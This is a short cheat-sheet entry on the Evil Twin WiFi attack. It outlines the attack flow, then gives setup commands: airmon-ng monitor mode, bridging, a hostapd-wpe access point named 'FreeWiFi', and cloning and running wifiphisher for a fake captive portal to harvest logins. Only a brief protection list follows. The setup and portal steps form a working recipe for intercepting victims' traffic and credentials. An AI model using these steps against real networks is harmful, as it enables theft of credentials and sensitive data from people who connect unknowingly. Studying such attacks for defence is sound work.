High Severity | T1550
👻 Evil Twin Attack
🧠 Description
The Evil Twin attack creates a fake WiFi access point that mimics a legitimate network. When users connect, all their traffic can be intercepted, including credentials and sensitive data.
Attack Flow:
- Attacker creates access point with same SSID as legitimate network
- Victims are deauthenticated from legitimate AP
- Victims auto-connect to evil twin
- All traffic passes through attacker's machine
⚙️ Setup
# Enable monitor mode airmon-ng start wlan0 # Create bridge for internet sharing brctl addbr br0 brctl addif br0 eth0 # Configure hostapd-wpe (802.1X AP) # Edit hostapd-wpe.conf interface=wlan0mon ssid=FreeWiFi driver=nl80211 # Start hostapd-wpe hostapd-wpe hostapd-wpe.conf
🎣 Captive Portal Hijack
# Create fake captive portal # Use fluxion or wifiphisher git clone https://github.com/wifiphisher/wifiphisher cd wifiphisher && python3 wifiphisher # Or create manually with apache # /var/www/html/login.php
🛡️ Protection
- 802.1X (Enterprise WiFi): Certificate-based authentication
- VPN: Always use VPN on public networks
- HSTS: Prevents credential interception via SSL stripping
- Verify Network: Check MAC address, signal strength